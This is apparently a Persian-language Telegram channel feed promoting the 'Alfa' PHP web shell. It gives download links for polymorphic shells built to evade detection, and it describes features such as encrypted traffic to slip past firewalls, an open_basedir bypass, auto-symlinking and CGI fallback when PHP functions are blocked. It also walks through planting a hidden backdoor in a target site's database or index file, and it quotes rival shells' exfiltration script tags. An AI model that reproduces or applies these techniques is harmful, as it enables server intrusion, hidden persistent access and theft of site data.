Solevisible / ALFA TEAM

دوستان یک مدتیه اکانت گیتهاب ما ریپورت شده و بسته شده به دلیل منتشر کردن شل... در حاله مکاتبه با پشتیبانان گیتهاب هستیم و شرط گذاشتن که شل هارو برداریم. در صورت حذف شل از گیتهاب در ریپوزیتوری لینک سورس از یک سایت دیگه رو میذاریم فعلا برای دانلود شل از همین آدرس استفاده کنین http://dl.solevisible.com

همونطوری که قبلا اعلام کرده بودیم قرار بود سرویسی طراحی کنیم که برای هر کاربر شل با کد های متفاوت بده ... از این لحظه به بعد میتونید از سایت زیر هر تعداد که خواستین شل رو دانلود کنید شل آخرین ورژن هست و هر بار که دانلود میکنید سورسش عوض میشه... پس اگر یک موقع سروری داشتین که شل رو حذف میکرد میتونین از سایت زیر دانلود کنید... [+] بعدن الگوریتم های بیشتری بهش اضافه میکنیم. http://dl.solevisible.com #Alfa_Team @solevisible

یه سری از دوستان پیام میدادن میگفتن دلیل که شل بعد از اجرا درخواستی میفرسته به سایت ما چیه ؟؟!! برای همین تصمیم گرفتیم این موضوع رو باز کنیم... در تصویر بالا قسمتی از شل آلفا هست که وظیفه اش چک کردن ورژن شل در هر بار رفرش شدن هست. یعنی زمانی که شما شل رو برای اولین بار اجرا میکنید شل میاد یک درخواست [ HTTP GET ] ساده بدون ارسال هیچ گونه پارامتر اضافی به سایت ما میفرسته برای چک کردن اینکه آیا ورژن جدیدی از شل منتشر شده یا نه در صورتی که ورژن جدیدی منتشر کرده باشیم این قسمت میاد یک صفحه پاپ آپ براتون تو شل باز میکنه که شما رو از وجود نسخه جدید شل با خبر میکنه... @solevisible

http://inject0r.com http://www.w0rms.com http://www.w0rms.com/sayac.js این دو مورد هم اضافه شد که شل هاش آلوده اس و متعلق به همین شخصی هست که در بالا توضیح دادیم @solevisible

دوستان اگه شل مشکلی چیزی داشت به صورت ناشناس مارو در جریان قرار بدین 😁 https://telegram.me/harfbemanbot?start=MjE3MjA2Nzkw

[+] امکان شخصی سازی کامل رنگ ها در شل [ Customize Colors ]... - از قسمت تنظيمات [ Alfa Settings ] ميتونيد رنگارو عوض کنيد. همچنين امکان گرفتن بکاپ و ريستور اون را هم گذاشتيم و حتا در صورتی که پشيمون شديد و خواستيد رنگ اصلی خود شل رو استفاده کنيد فقط با زدن تيک [ use Default color ] ميتونيد به حالت پيشفرض برش گردونيد. [+] امکان اجرای اسکريپت های [ Python - Perl - Bash ] در قسمت [ Eval ]... - در ورژن های قبل فقط امکان اجرای کد های پی اچ پی وجود داشت ولی در این نسخه شما میتونید با 3 زبان دیگر هم کار کنید. [+] سيملينک کاملن خودکار [ Auto Symlink ] ... - سيستم سيملينک کاملن از 0 طراحی شده و با استفاده از 3 زبان يعنی [ Php - Python - Perl ] ميتونيد سيملينک بزنيد. [+] ارسال اطلاعات از شل به سرور با استفاده از الگوريتم پيچيده و غيرقابل خوندن [ POST ENCRYPTION ] ... - در ورژن های قبلی شل آلفا اطلاعات به سمت سرور با استفاده از الگوريتم [ Base64 ] ارسال ميشد و اين روش فايروال های سرور رو تا حدی گيج ميکرد تا نتونن تشخيص بدن... ولي خب احتمال لاگ شدن داده های ارسالی در سرور وجود داره و در صورت لاگ شدن اطلاعات به راحتی ديکد ميشن و ميتونن به داده های اصلی برسن... حالا در اين نسخه ما از يک الگوريتم پيچيده تر استفاده کرديم يعنی در صورتی که شما در يک شبکه محلی باشين حتا در صورت شنود اطلاعات ترافيک ، داده هايی که به سمت سرور ارسال شدن غير قابل خوندن هستن و هرکاربری که از شل استفاده ميکنه يک کليد مخصوص برای همون شخص تو شل ساخته ميشه و فقط اطلاعات با همون کليد قابل خوندن هستن.همچنين شما ميتونيد اين امکان رو از تنظيمات شل غيرفعال کنيد و از همون الگوريتم [Base64] استفاده کنيد... [+] تغيير استايل و بازنويسي کامل [ CGI SHELL ] و اضافه شدن امکان آپلود فايل و حل مشکل حذف شدن توسط آنتی شل سرور... - دقت کرده باشين گاهی بعد از اجرای [ CGI SHELL ] يک لحظه سی جی آی بالا مياد و بعدش ارور ميده... اين به خاطر اينه که آنتی شلر سرور پاکش ميکنه ... ولی در اين نسخه ما کاملن سورس سی جی آی هارو کد کرديم تا مانع تشخيصش بشيم... [+] امکان بايپس محدوديت [ Open_basedir ] در سرور ... - شما در ورژن های قبلی در صورتی که مقدار [ Open_basedir ] برابر [ NONE ] ميتونستيد به پوشه های ديگه مثل [ /etc/ ] و امثال اون بريد ولی در صورتی که [ NONE ] نبود به شما اررور [ ACCESS DENIDE ] ميداد ولی در اين نسخه شما ميتونيد برين تو پوشه های ديگه بگرديد... [+++] اضافه شدن [ CGI API ] و قدرت گرفتن شل آلفا از 4 زبان : [ Php - Python - Perl - Bash ] ... - اين قسمت رو ميتونيم کليدی ترين و مهمترین آپشن اين نسخه از شل بناميم... در جريان هستيد که شل از پايه با زبان [ PHP ] طراحی شده و سرور منيجر ها ميتونن توابع پی اچ پی رو محدود کنن... حالا در اين نسخه ، شل به صورت خودکار مياد در صورتی که توابع بسته باشه سويچ ميکنه به حالت [ CGI ] و تمام کاراشو با همين انجام ميده...اين کار باعث ميشه همچنان قدرت شل حفظ بشه تا شما بتونید دستورات خودتون رو حتا در صورت بسته بودن توابع پی اچ پی اجرا کنيد. ( مثل این میمونه شما CGI SHELL رو سرور آپلود کردی و داری باش کار میکنی... ) نتیجه: ورژن های قبلی رو شیفت دیلیت کنید 😁 https://github.com/solevisible/ALFA-SHELL-V3 #Alfa_Team @solevisible

auto symlink #ALFA_TEaM @solevisible

قبلن هم گفتیم ما با هیچ گروه یا شخصی در ارتباط نیستیم تیم ما کلن دو نفرست ولی یه سری از دوستان همچنان در حال شیطونی کردنن Sole Sad & Invisible نه هیچ شخص دیگه ای تو تیم حضور داره ، نه همکاری داره @solevisible

با توجه به نظرسنجی اکثریت میخوان شل و رنگاشو شخصی سازی کنن پس این امکان رو قرار میدیم... و مهمتر از اون متد جدیدی به شل داریم اضافه میکنیم که باهاش میشه ارور های 500 و 404 در سیم لینک رو بایپس کرد و ی سری امکانات دیگه... @solevisible

[+] دوستان برای بک آپ گرفتن از دیتابیس تارگت از Mysql dumper استفاده کنید... [+] خود Sql manager گویا یه مشکل ریز داره و مقادیر خالی رو میگیره ... [+] تو آپدیت بعدی شل که داریم روش کار میکنیم که احتمالا تا اواخر شهریور و یا در مهر ماه کامل میشه این مشکل رفع خواهد شد. #Alfa_Team @solevisible

. » Install Backdoor « * از این قسمت ما برای نصب بکدور بر روی تارگت استفاده میکنیم . - شما به دو صورت میتونین بکدور خودتون رو روی تارگت نصب کنید 1- in database [ نصب بکدور در دیتابیس ] 2- in file [ نصب بکدور در فایل ] * برای نصب بکدور در دیتابیس تارگت [ in database ]: - اطلاعات دیتابیس رو وارد میکنیم [ از getConfig هم میتونین استفاده کنین تا خودکار اطلاعات دیتابیس ست بشه ] - حالا در قسمت [ backdoor loader ] آدرس فایلی که میخواهیم بکدور ما ازش فراخونی بشه رو ست میکنیم مثلن من میخوام رو ایندکس سایت بزنم به این صورت : /home/alfa/public_html/index.php - حالا در قسمت کی [ key ] کلید مورد نظرمون رو ست میکنیم .این قسمت هرچی خواستین میتونید ست کنید حکم پسورد رو برای بکدور داره. - و در آخر از قسمت [ use ] باید بکدور خودمون رو انتخاب کنیم . به صورت پیشفرض مینی آپلودر آلفا ست شده ولی شما میتونین گزینه [ my private shell ] رو انتخاب کنید و شلر یا آپلودر مخصوص خودتون رو ست کنید - و در آخر دکمه ارسال [ « ] رو میزنیم... - حالا شما برای دسترسی به بکدور باید به این صورت عمل کنید : http://127.0.1.1/index.php?alfa=[key] - نمونه: http://127.0.1.1/index.php?alfa=private - خب [ private ] همون کی [ key ] هستش که من اینجا ازش استفاده کردم . این رو اشتباه بزنید بکدور شما اجرا نمیشه. [+] نحوه کار به این صورت هست : - بعد اینکه مراحل بالا رو انجام دادین در دیتابیس تارگت یه تیبل [ Table ] ساخته میشه و کد های آپلودر و یا شل شما تو تیبلی که خود آلفا میسازه ذخییره میشه و زمانی که شما از طریق لودر بکدور رو اجرا میکنید لودر میاد به دیتابیس وصل میشه و از همون تیبل شل رو فراخونی میکنه ... - این روش کمک میکنه بکدور شما از دید آنتی شلر ها مخفی بمونه ! #Alfa_Team @solevisible

دوستان عزیز به هیچ عنوان از این وبسایت شلی دانلود نکنید چون تمام شل ها بکدور داره و لینک شل هاتون رو برای مدیرش میفرسته و دسترسیتون به راحتی لو میره حتا شل آلفا تو این وبسایت آلوده شده » http://r00t.info « » privshell.com « بعد از اجرای شل یه شل دیگه از این مسیر http://r00t.info/txt/lamer.txt دانلود میشه و از دید شما مخفی میشه به دو روش آدرس شل شما ارسال میشه 1 - به صورت ایمیل [ byhero44@gmail.com , priphp@hotmail.com ] 2- به صورت جاوا اسکریپت [ <script src=http://r00t.info/ccb.js></script> ] شل آلفا بدون هیچ بکدوری هست و سالم....! بعضی از سایت ها مثل همین سایت سو استفاده میکنن و بکدور میذارن لطفن اگه خواستین از شل آلفا استفاده کنید از همین تلگرام ما یا از گیتهاب ما دانلود کنید. لینک گیتهاب : http://github.com/solevisible/ALFA-SHELL-V2.5 #Alfa_Team @solevisible

دوستان ما (sole sad & invisible) تو هیچ گروه یا تیمی به جز ALFA فعالیت نداریم ، تیم آلفا هم کلن دو نفرست ، هیچ سایتی هم نداریم ، فقط همین کانال تلگرامو داریم واسه اطلاع رسانی در مورد شل و برنامه هایی که در اینده قراره نوشته شه 😃